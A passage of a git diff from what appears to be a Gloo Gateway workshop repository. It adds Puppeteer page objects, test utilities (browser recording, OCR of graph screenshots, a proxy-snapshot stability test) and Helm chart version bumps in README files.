this.submitSubscriptionCreation(); + } + + async createAppAndSubscribe(teamName, appName, appDescription, apiProductName) { + await this.createNewApp(teamName, appName, appDescription); + await this.navigateToAppDetails(); + await this.createSubscription(apiProductName); + } + + async createApiKey(keyName) { + // Click ADD API KEY button + await this.page.locator(this.addApiKeyButton).click(); + + // Wait for and fill in the name input + await this.page.waitForSelector(this.apiKeyNameInput, { visible: true }); + await this.page.type(this.apiKeyNameInput, keyName); + + // Click create button + await this.page.locator(this.submitApiKeyButton).click(); + + // Get API key value from clipboard + await this.page.waitForSelector(this.copyApiKeyButton, { visible: true }); + await this.page.click(this.copyApiKeyButton); + + const clipboardContent = await this.page.evaluate(() => navigator.clipboard.readText()); + + // Close the modal + await this.page.locator(this.closeModalButton).click(); + + return clipboardContent; + } + + async createOAuthClient() { + // Click initial Create OAuth Client button + await this.page.click(this.createOAuthClientButton); + + // Wait for and click confirm button in modal + await this.page.waitForSelector(this.confirmOAuthClientButton, { visible: true }); + await this.page.locator(this.confirmOAuthClientButton).click(); + + // Wait for and click copy button + await this.page.waitForSelector(this.copyOAuthClientButton, { visible: true }); + await this.page.click(this.copyOAuthClientButton); + + // Wait for the 'Client ID' label to appear in the modal using page.waitForFunction with XPath + await this.page.waitForFunction(() => { + return document.evaluate( + '//div[text()="Client ID"]', + document, + null, + XPathResult.FIRST_ORDERED_NODE_TYPE, + null + ).singleNodeValue !== null; + }); + + // Get the Client ID + const clientId = await this.page.evaluate(() => { + const clientIdLabel = document.evaluate( + '//div[text()="Client ID"]', + document, + null, + XPathResult.FIRST_ORDERED_NODE_TYPE, + null + ).singleNodeValue; + + if (clientIdLabel && clientIdLabel.nextElementSibling) { + return clientIdLabel.nextElementSibling.textContent.trim(); + } + return null; + }); + + // Get the Client Secret + const clientSecret = await this.page.evaluate(() => { + const clientSecretLabel = document.evaluate( + '//div[text()="Client Secret"]', + document, + null, + XPathResult.FIRST_ORDERED_NODE_TYPE, + null + ).singleNodeValue; + + if (clientSecretLabel && clientSecretLabel.nextElementSibling) { + const button = clientSecretLabel.nextElementSibling; + // The secret value is inside the button's inner text + const secretText = button.innerText.trim().split('\n')[0]; + return secretText; + } + return null; + }); + + // Close the modal + await this.page.click(this.closeModalButton); + + return { + clientId, + clientSecret, + }; + } + +} + +module.exports = DeveloperPortalAppsPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/home-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/home-page.js new file mode 100644 index 0000000000..8957364a95 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/home-page.js @@ -0,0 +1,31 @@ +const BasePage = require("../base"); + +class DeveloperPortalHomePage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.loginLink = 'a[href="/v1/login"]'; + this.userHolder = '.userHolder'; + this.logoutLink = 'a[href="/v1/logout"]'; + } + + async clickLogin() { + await this.page.waitForSelector(this.loginLink, { visible: true }); + await this.page.click(this.loginLink); + } + + async getLoggedInUserName() { + await this.page.waitForSelector(this.userHolder, { visible: true }); + + const username = await this.page.evaluate(() => { + const userHolderDiv = document.querySelector('.userHolder'); + const text = userHolderDiv ? userHolderDiv.textContent.trim() : ''; + return text.replace(/]*>([\s\S]*?)<\/svg>/g, '').trim(); + }); + + return username; + } +} + +module.exports = DeveloperPortalHomePage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/teams-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/teams-page.js new file mode 100644 index 0000000000..53baabd7aa --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/teams-page.js @@ -0,0 +1,65 @@ +const BasePage = require("../base"); + +class DeveloperPortalTeamsPage extends BasePage { + constructor(page) { + super(page); + + // Team creation selectors + this.createTeamButton = 'button ::-p-text("CREATE NEW TEAM")'; + this.teamNameInput = '#team-name-input'; + this.teamDescriptionInput = '#team-description-input'; + this.submitTeamButton = 'button[type="submit"] ::-p-text("Create Team")'; + + // Team details and user management selectors + this.detailsLink = 'a::-p-text("DETAILS")'; + this.addUserButton = 'div::-p-text("ADD USER")'; + this.memberEmailInput = '#member-email-input'; + this.submitAddUserButton = 'button[type="submit"] ::-p-text("ADD USER")'; + } + + async clickCreateNewTeam() { + await this.page.locator(this.createTeamButton).click(); + } + + async fillTeamDetails(name, description) { + await this.page.waitForSelector(this.teamNameInput, { visible: true }); + await this.page.type(this.teamNameInput, name); + + await this.page.waitForSelector(this.teamDescriptionInput, { visible: true }); + await this.page.type(this.teamDescriptionInput, description); + } + + async submitTeamCreation() { + await this.page.locator(this.submitTeamButton).click(); + } + + async createNewTeam(name, description) { + await this.clickCreateNewTeam(); + await this.fillTeamDetails(name, description); + await this.submitTeamCreation(); + } + + async navigateToTeamDetails() { + await this.page.locator(this.detailsLink).click(); + } + + async addUserToTeam(email) { + // Click the initial ADD USER button to open the form + await this.page.locator(this.addUserButton).click(); + + // Wait for and fill in the email input + await this.page.waitForSelector(this.memberEmailInput, { visible: true }); + await this.page.type(this.memberEmailInput, email); + + // Click the submit button to add the user + await this.page.locator(this.submitAddUserButton).click(); + } + + async createTeamAndAddUser(teamName, teamDescription, userEmail) { + await this.createNewTeam(teamName, teamDescription); + await this.navigateToTeamDetails(); + await this.addUserToTeam(userEmail); + } +} + +module.exports = DeveloperPortalTeamsPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/graph-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/graph-page.js new file mode 100644 index 0000000000..25527dc275 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/graph-page.js @@ -0,0 +1,90 @@ +const BasePage = require("../base"); + +class GraphPage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.clusterDropdownButton = '[data-testid="cluster-dropdown"] button'; + this.selectCheckbox = (value) => `input[type="checkbox"][value="${value}"]`; + this.namespaceDropdownButton = '[data-testid="namespace-dropdown"] button'; + this.fullscreenButton = '[data-testid="graph-fullscreen-button"]'; + this.centerButton = '[data-testid="graph-center-button"]'; + this.canvasSelector = '[data-testid="graph-screenshot-container"]'; + this.layoutSettingsButton = '[data-testid="graph-layout-settings-button"]'; + this.ciliumNodesButton = '[data-testid="graph-cilium-toggle"]'; + this.disableCiliumNodesButton = '[data-testid="graph-cilium-toggle"][aria-checked="true"]'; + this.enableCiliumNodesButton = '[data-testid="graph-cilium-toggle"][aria-checked="false"]'; + + } + + async selectClusters(clusters) { + await this.page.waitForSelector(this.clusterDropdownButton, { visible: true }); + await this.page.click(this.clusterDropdownButton); + for (const cluster of clusters) { + await this.page.waitForSelector(this.selectCheckbox(cluster), { visible: true }); + await this.page.click(this.selectCheckbox(cluster)); + await new Promise(resolve => setTimeout(resolve, 50)); + } + } + + async selectNamespaces(namespaces) { + await this.page.click(this.namespaceDropdownButton); + for (const namespace of namespaces) { + await this.page.waitForSelector(this.selectCheckbox(namespace), { visible: true }); + await this.page.click(this.selectCheckbox(namespace)); + await new Promise(resolve => setTimeout(resolve, 50)); + } + } + + async toggleLayoutSettings() { + await this.page.waitForSelector(this.layoutSettingsButton, { visible: true, timeout: 5000 }); + await this.page.click(this.layoutSettingsButton); + // Toggle Layout settings takes a while to open, subsequent actions will fail if we don't wait + await new Promise(resolve => setTimeout(resolve, 1000)); + } + + async enableCiliumNodes() { + const ciliumNodesButtonExists = await this.page.$(this.ciliumNodesButton) !== null; + if (ciliumNodesButtonExists) { + await this.page.waitForSelector(this.enableCiliumNodesButton, { visible: true, timeout: 5000 }); + await this.page.click(this.enableCiliumNodesButton); + } + } + + async disableCiliumNodes() { + const ciliumNodesButtonExists = await this.page.$(this.ciliumNodesButton) !== null; + if (ciliumNodesButtonExists) { + await this.page.waitForSelector(this.disableCiliumNodesButton, { visible: true, timeout: 5000 }); + await this.page.click(this.disableCiliumNodesButton); + } + } + + async fullscreenGraph() { + await this.page.click(this.fullscreenButton); + await new Promise(resolve => setTimeout(resolve, 150)); + } + + async centerGraph() { + await this.page.click(this.centerButton); + await new Promise(resolve => setTimeout(resolve, 150)); + } + + async waitForLoadingContainerToDisappear(timeout = 50000) { + await this.page.waitForFunction( + () => !document.querySelector('[data-testid="loading-container"]'), + { timeout } + ); + } + + async captureCanvasScreenshot(screenshotPath) { + await this.page.waitForSelector(this.canvasSelector, { visible: true, timeout: 5000 }); + await this.waitForLoadingContainerToDisappear(); + await this.page.waitForNetworkIdle({ timeout: 5000, idleTime: 500, maxInflightRequests: 0 }); + + const canvas = await this.page.$(this.canvasSelector); + await canvas.screenshot({ path: screenshotPath, omitBackground: true }); + } +} + +module.exports = GraphPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/overview-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/overview-page.js new file mode 100644 index 0000000000..db104d34c3 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/overview-page.js @@ -0,0 +1,34 @@ +const BasePage = require("../base"); + +class OverviewPage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.listedWorkspacesLinks = 'div[data-testid="overview-area"] div[data-testid="solo-link"] a'; + this.licensesButtons = [ + 'button[data-testid="topbar-licenses-toggle"]', + 'div[data-testid="topbar-licenses-toggle"] button' + ]; + } + + async getListedWorkspaces() { + await this.page.waitForSelector(this.listedWorkspacesLinks, { visible: true, timeout: 5000 }); + + const workspaceNames = await this.page.evaluate((selector) => { + const links = document.querySelectorAll(selector); + + return Array.from(links).map(link => link.textContent.trim()); + }, this.listedWorkspacesLinks); + + return workspaceNames; + } + + async hasPageLoaded() { + const licenseButton = await this.findVisibleSelector(this.licensesButtons); + await this.page.waitForSelector(licenseButton, { visible: true, timeout: 1000 }); + return true; + } +} + +module.exports = OverviewPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/welcome-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/welcome-page.js new file mode 100644 index 0000000000..3c025ae3df --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/gloo-ui/welcome-page.js @@ -0,0 +1,17 @@ +const BasePage = require("../base"); + +class WelcomePage extends BasePage { + constructor(page) { + super(page); + + // Selectors + this.signInButton = 'button'; + } + + async clickSignIn() { + await this.page.waitForSelector(this.signInButton, { visible: true, timeout: 5000 }); + await this.page.click(this.signInButton); + } +} + +module.exports = WelcomePage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/insights-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/insights-page.js new file mode 100644 index 0000000000..a61899d410 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/insights-page.js @@ -0,0 +1,109 @@ +const BasePage = require("./base"); + +class InsightsPage extends BasePage { + constructor(page) { + super(page); + + // Selectors + this.insightTypeQuickFilters = { + healthy: '[data-testid="health-count-box-healthy"]', + warning: '[data-testid="health-count-box-warning"]', + error: '[data-testid="health-count-box-error"]' + }; + this.clusterDropdownButtonSelectors = [ + '[data-testid="filter by cluster...-dropdown"] button', + '[data-testid="search by cluster...-dropdown"] button' + ]; + + this.filterByTypeDropdown = '[data-testid="filter by type...-dropdown"] button'; + this.clearAllButton = '[data-testid="solo-tag"]:first-child'; + this.tableHeaders = '.ant-table-thead th'; + this.tableRows = '.ant-table-tbody tr'; + this.paginationTotalText = '.ant-pagination-total-text'; + this.selectCheckbox = (name) => `input[type="checkbox"][value="${name}"]`; + } + + async getHealthyResourcesCount() { + return parseInt(await this.page.$eval(this.insightTypeQuickFilters.healthy, el => el.querySelector('div').textContent)); + } + + async getWarningResourcesCount() { + return parseInt(await this.page.$eval(this.insightTypeQuickFilters.warning, el => el.querySelector('div').textContent)); + } + + async getErrorResourcesCount() { + return parseInt(await this.page.$eval(this.insightTypeQuickFilters.error, el => el.querySelector('div').textContent)); + } + + + async openFilterByTypeDropdown() { + await this.page.waitForSelector(this.filterByTypeDropdown, { visible: true }); + await this.page.click(this.filterByTypeDropdown); + } + + async openSearchByClusterDropdown() { + const clusterDropdownButton = await this.findVisibleSelector(this.clusterDropdownButtonSelectors); + await this.page.waitForSelector(clusterDropdownButton, { visible: true }); + await this.page.click(clusterDropdownButton); + } + + async clearAllFilters() { + await this.page.click(this.clearAllButton); + } + + async getTableHeaders() { + return this.page.$$eval(this.tableHeaders, headers => headers.map(h => h.textContent.trim())); + } + + /** + * Returns a string of arrays for each row. + * @returns {Promise} The table data rows as a string of arrays. + */ + async getTableDataRows() { + const rowsData = await this.page.$$eval(this.tableRows, rows => + rows.map(row => { + const cells = row.querySelectorAll('td'); + const rowData = []; + for (const cell of cells) { + rowData.push(cell.textContent.trim()); + } + return rowData.join(' '); + }) + ); + return rowsData; + } + + async clickDetailsButton(rowIndex) { + const buttons = await this.page.$$(this.detailsButton); + if (rowIndex < buttons.length) { + await buttons[rowIndex].click(); + } else { + throw new Error(`Row index ${rowIndex} is out of bounds`); + } + } + + async getTotalItemsCount() { + const totalText = await this.page.$eval(this.paginationTotalText, el => el.textContent); + return parseInt(totalText.match(/Total (\d+) items/)[1]); + } + + async selectClusters(clusters) { + this.openSearchByClusterDropdown(); + for (const cluster of clusters) { + await this.page.waitForSelector(this.selectCheckbox(cluster), { visible: true }); + await this.page.click(this.selectCheckbox(cluster)); + await new Promise(resolve => setTimeout(resolve, 50)); + } + } + + async selectInsightTypes(types) { + this.openFilterByTypeDropdown(); + for (const type of types) { + await this.page.waitForSelector(this.selectCheckbox(type), { visible: true }); + await this.page.click(this.selectCheckbox(type)); + await new Promise(resolve => setTimeout(resolve, 50)); + } + } +} + +module.exports = InsightsPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/keycloak-sign-in-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/keycloak-sign-in-page.js new file mode 100644 index 0000000000..d454812df3 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/keycloak-sign-in-page.js @@ -0,0 +1,29 @@ +const BasePage = require("./base"); + +class KeycloakSignInPage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.usernameInput = '#username'; + this.passwordInput = '#password'; + this.loginButton = '#kc-login'; + this.showPasswordButton = 'button[data-password-toggle]'; + } + + async signIn(username, password) { + await new Promise(resolve => setTimeout(resolve, 50)); + await this.page.waitForSelector(this.usernameInput, { visible: true }); + await this.page.type(this.usernameInput, username); + + await new Promise(resolve => setTimeout(resolve, 50)); + await this.page.waitForSelector(this.passwordInput, { visible: true }); + await this.page.type(this.passwordInput, password); + + await new Promise(resolve => setTimeout(resolve, 50)); + await this.page.waitForSelector(this.loginButton, { visible: true }); + await this.page.click(this.loginButton); + } +} + +module.exports = KeycloakSignInPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/proxies-changes.test.js.liquid b/gloo-gateway/1-18/enterprise-vm/default/tests/proxies-changes.test.js.liquid new file mode 100644 index 0000000000..46bbe1422e --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/proxies-changes.test.js.liquid @@ -0,0 +1,57 @@ +const { execSync } = require('child_process'); +const { expect } = require('chai'); +const { diff } = require('jest-diff'); + +function delay(ms) { + return new Promise(resolve => setTimeout(resolve, ms)); +} + +describe('Gloo snapshot stability test', function() { + let contextName = process.env.{{ context | default: "CLUSTER1" }}; + let delaySeconds = {{ delay | default: 5 }}; + + let firstSnapshot; + + it('should retrieve initial snapshot', function() { + const output = execSync( + `kubectl --context ${contextName} -n gloo-system exec deploy/gloo -- wget -O - localhost:9095/snapshots/proxies -q`, + { encoding: 'utf8' } + ); + + try { + firstSnapshot = JSON.parse(output); + } catch (err) { + throw new Error('Failed to parse JSON output from initial snapshot: ' + err.message); + } + expect(firstSnapshot).to.be.an('object'); + }); + + it('should not change after the given delay', async function() { + await delay(delaySeconds * 1000); + + let secondSnapshot; + try { + const output2 = execSync( + `kubectl --context ${contextName} -n gloo-system exec deploy/gloo -- wget -O - localhost:9095/snapshots/proxies -q`, + { encoding: 'utf8' } + ); + secondSnapshot = JSON.parse(output2); + } catch (err) { + throw new Error('Failed to retrieve or parse the second snapshot: ' + err.message); + } + + const firstJson = JSON.stringify(firstSnapshot, null, 2); + const secondJson = JSON.stringify(secondSnapshot, null, 2); + + // Show only 2 lines of context around each change + const diffOutput = diff(firstJson, secondJson, { contextLines: 2, expand: false }); + + if (! diffOutput.includes("Compared values have no visual difference.")) { + console.error('Differences found between snapshots:\n' + diffOutput); + throw new Error('Snapshots differ after the delay.'); + } else { + console.log('No differences found. The snapshots are stable.'); + } + }); +}); + diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/utils.js b/gloo-gateway/1-18/enterprise-vm/default/tests/utils.js new file mode 100644 index 0000000000..9747efaa2c --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/utils.js @@ -0,0 +1,13 @@ +global = { + sleep: ms => new Promise(resolve => setTimeout(resolve, ms)), + waitOnFailedTest: (done, currentRetry) => { + if(currentRetry > 0){ + process.stdout.write("."); + setTimeout(done, 1000); + } else { + done(); + } + } +}; + +module.exports = global; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/utils/enhance-browser.js b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/enhance-browser.js new file mode 100644 index 0000000000..b7a1e3aa27 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/enhance-browser.js @@ -0,0 +1,124 @@ +const fs = require('fs'); +const path = require('path'); +const { debugLog } = require('./logging'); + +function enhanceBrowser(browser, testId = 'test', shouldRecord = true) { + let recorder; + let page; + let sanitizedTestId = testId.replace(/ /g, '_'); + const downloadPath = path.resolve('./ui-test-data'); + fs.mkdirSync(downloadPath, { recursive: true }); + + async function withTimeout(promise, ms, errorMessage) { + let timeoutId; + const timeoutPromise = new Promise((_, reject) => { + timeoutId = setTimeout(() => reject(new Error(errorMessage)), ms); + }); + const result = await Promise.race([promise, timeoutPromise]); + clearTimeout(timeoutId); + return result; + } + + function enhancePage(page) { + const methodsToWrap = ['waitForSelector', 'click', 'goto', 'type']; + return new Proxy(page, { + get(target, prop) { + const originalMethod = target[prop]; + if (typeof originalMethod === 'function' && methodsToWrap.includes(prop)) { + return async function (...args) { + try { + return await originalMethod.apply(target, args); + } catch (error) { + const pageContent = await target.content(); + console.error(`Error in page method '${prop}':`, error); + console.error('Page content at the time of error:'); + console.error(pageContent); + throw error; + } + }; + } else if (typeof originalMethod === 'function') { + return originalMethod.bind(target); + } else { + return originalMethod; + } + }, + }); + } + + const enhancedBrowser = new Proxy(browser, { + get(target, prop) { + if (prop === 'newPage') { + return async function (...args) { + page = await target.newPage(...args); + await page.setViewport({ width: 1500, height: 1000 }); + if (shouldRecord) { + recorder = await page.screencast({ path: `./ui-test-data/${sanitizedTestId}-recording.webm` }); + } + + // Enhance the page here + page = enhancePage(page); + + return page; + }; + } else if (prop === 'close') { + return async function (...args) { + if (page) { + if (shouldRecord && recorder) { + debugLog('Stopping recorder...'); + try { + await withTimeout(recorder.stop(), 2000, 'Recorder stop timed out'); + debugLog('Recorder stopped.'); + } catch (e) { + debugLog('Failed to stop recorder:', e); + } + } + try { + debugLog('Checking if page has __DUMP_SWR_CACHE__'); + const hasDumpSWRCache = await page.evaluate(() => !!window.__DUMP_SWR_CACHE__); + if (hasDumpSWRCache) { + debugLog('Dumping SWR cache...'); + const client = await page.target().createCDPSession(); + const fileName = `${sanitizedTestId}-dump-swr-cache.txt`; + const fullDownloadPath = path.join(downloadPath, fileName); + + await client.send('Page.setDownloadBehavior', { + behavior: 'allow', + downloadPath: downloadPath, + }); + await page.evaluate(() => { + window.__DUMP_SWR_CACHE__("dump-swr-cache.txt"); + }); + + // waiting for the file to be saved + await new Promise((resolve) => setTimeout(resolve, 5000)); + fs.renameSync(path.join(downloadPath, "dump-swr-cache.txt"), fullDownloadPath); + debugLog('UI dump of SWR cache:', fullDownloadPath); + } else { + debugLog('__DUMP_SWR_CACHE__ not found on window object.'); + } + } catch (e) { + debugLog('Failed to dump SWR cache:', e); + } + } + try { + await new Promise((resolve) => setTimeout(resolve, 7100)); + await target.close(...args); + } catch (error) { + console.error('Error closing browser:', error); + } + }; + } else { + const value = target[prop]; + if (typeof value === 'function') { + return value.bind(target); + } else { + return value; + } + } + }, + }); + + return enhancedBrowser; +} + +module.exports = { enhanceBrowser }; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/utils/image-ocr-processor.js b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/image-ocr-processor.js new file mode 100644 index 0000000000..f19de7fa5c --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/image-ocr-processor.js @@ -0,0 +1,174 @@ +const Tesseract = require('tesseract.js'); +const sharp = require('sharp'); +const fs = require('fs'); +const path = require('path'); +const { debugLog } = require('../utils/logging'); + +const OUTPUT_DIR = 'extracted_text_boxes'; + +// Helper function to check if the pixel color matches the target color +function colorsMatch(pixel, targetColor, channels) { + if (channels === 4) { + return ( + pixel[0] === targetColor.r && + pixel[1] === targetColor.g && + pixel[2] === targetColor.b && + pixel[3] === 255 + ); + } else if (channels === 3) { + return ( + pixel[0] === targetColor.r && + pixel[1] === targetColor.g && + pixel[2] === targetColor.b + ); + } + return false; +} + +// Function to find bounding boxes that match the target color +async function getTextBoxBoundingBoxes(imageBuffer, width, height, channels, targetColor) { + const boundingBoxes = []; + const visited = new Array(width * height).fill(false); + const getIndex = (x, y) => y * width + x; + + for (let y = 0; y < height; y++) { + for (let x = 0; x < width; x++) { + const idx = getIndex(x, y); + if (visited[idx]) continue; + + const pixelStart = idx * channels; + const pixel = imageBuffer.slice(pixelStart, pixelStart + channels); + if (colorsMatch(pixel, targetColor, channels)) { + const queue = []; + queue.push({ x, y }); + visited[idx] = true; + + let minX = x, + maxX = x; + let minY = y, + maxY = y; + + while (queue.length > 0) { + const { x: currentX, y: currentY } = queue.shift(); + + const neighbors = [ + { x: currentX + 1, y: currentY }, + { x: currentX - 1, y: currentY }, + { x: currentX, y: currentY + 1 }, + { x: currentX, y: currentY - 1 }, + ]; + + for (const neighbor of neighbors) { + if ( + neighbor.x >= 0 && + neighbor.x < width && + neighbor.y >= 0 && + neighbor.y < height + ) { + const neighborIdx = getIndex(neighbor.x, neighbor.y); + if (!visited[neighborIdx]) { + const neighborPixelStart = neighborIdx * channels; + const neighborPixel = imageBuffer.slice( + neighborPixelStart, + neighborPixelStart + channels + ); + if (colorsMatch(neighborPixel, targetColor, channels)) { + queue.push({ x: neighbor.x, y: neighbor.y }); + visited[neighborIdx] = true; + + minX = Math.min(minX, neighbor.x); + maxX = Math.max(maxX, neighbor.x); + minY = Math.min(minY, neighbor.y); + maxY = Math.max(maxY, neighbor.y); + } + } + } + } + } + + const padding = -1; + const removePointingCaret = 6; + boundingBoxes.push({ + left: Math.max(0, Math.min(minX - padding, width - 1)), + top: Math.max(0, Math.min(minY - padding, height - 1)), + width: Math.max( + 1, + Math.min(maxX - minX + 2 * padding, width - Math.max(0, minX - padding)) + ), + height: Math.max( + 1, + Math.min(maxY - minY + 2 * padding, height - Math.max(0, minY - padding)) + ) - removePointingCaret, + }); + } + } + } + + return boundingBoxes; +} + +// Function to extract boxes from image +async function extractTextBoxes(inputImagePath, targetColor) { + const image = sharp(inputImagePath); + const metadata = await image.metadata(); + const { width, height, channels } = metadata; + + if (channels !== 3 && channels !== 4) { + throw new Error(`Unsupported number of channels: ${channels}. Only RGB and RGBA are supported.`); + } + + const { data } = await image.raw().toBuffer({ resolveWithObject: true }); + const boundingBoxes = await getTextBoxBoundingBoxes(data, width, height, channels, targetColor); + debugLog(`Found ${boundingBoxes.length} text box(es).`); + + if (!fs.existsSync(OUTPUT_DIR)) { + fs.mkdirSync(OUTPUT_DIR); + } + + const extractedImages = []; + for (let i = 0; i < boundingBoxes.length; i++) { + const image = sharp(inputImagePath); + let box = boundingBoxes[i]; + + // Skip small boxes, those are artifacts, or rediscoveries of the characters in the same box. + if (box.width < 50 && box.height < 30) { + continue; + } + + const outputPath = path.join(OUTPUT_DIR, `text_box_${i + 1}.png`); + await image.extract(box).ensureAlpha().png().toFile(outputPath); + extractedImages.push(outputPath); + } + + return extractedImages; +} + +// Extract boxes with `targetColor` and perform OCR on those. +/** + * Recognizes text from a screenshot image. + * + * @param {string} imagePath - The path to the screenshot image. + * @param {object} targetColor - The target color to extract text boxes. Default is { r: 53, g: 57, b: 59 } and it represent the service labels in the Observability graph. + * @param {string[]} expectedWords - An array of expected words to recognize. + * @returns {Promise} - A promise that resolves to an array of recognized texts. + */ +async function recognizeTextFromScreenshot(imagePath, expectedWords = [], targetColor = { r: 53, g: 57, b: 59 }) { + const whitelist = expectedWords.join('').replace(/\s+/g, ''); + const extractedImages = await extractTextBoxes(imagePath, targetColor); + + const recognizedTexts = []; + for (const image of extractedImages) { + const text = await Tesseract.recognize(image, 'eng', { + tessedit_pageseg_mode: 11, + tessedit_ocr_engine_mode: 1, + tessedit_char_whitelist: whitelist, + }).then(({ data: { text } }) => text); + recognizedTexts.push(text); + } + + return recognizedTexts; +} + +module.exports = { + recognizeTextFromScreenshot, +}; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/utils/logging.js b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/logging.js new file mode 100644 index 0000000000..e8cf677cff --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/utils/logging.js @@ -0,0 +1,9 @@ +const debugMode = process.env.RUNNER_DEBUG === '1' || process.env.DEBUG_MODE === 'true'; + +function debugLog(...args) { + if (debugMode && args.length > 0) { + console.log(...args); + } +} + +module.exports = { debugLog }; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise/ai-gateway/README.md b/gloo-gateway/1-18/enterprise/ai-gateway/README.md index b1edb5be12..5c66d62228 100644 --- a/gloo-gateway/1-18/enterprise/ai-gateway/README.md +++ b/gloo-gateway/1-18/enterprise/ai-gateway/README.md @@ -142,7 +142,7 @@ helm repo update helm upgrade -i -n gloo-system \ gloo-gateway gloo-ee-helm/gloo-ee \ --create-namespace \ - --version 1.18.0-rc6 \ + --version 1.18.0 \ --kube-context $CLUSTER1 \ --set-string license_key=$LICENSE_KEY \ -f -< -#
Gloo Gateway Workshop
+#
Gloo Gateway as a Waypoint
@@ -854,7 +854,7 @@ helm repo update helm upgrade -i -n gloo-system \ gloo-gateway gloo-ee-helm/gloo-ee \ --create-namespace \ - --version 1.18.0-rc6 \ + --version 1.18.0 \ --kube-context $CLUSTER1 \ --set-string license_key=$LICENSE_KEY \ -f -<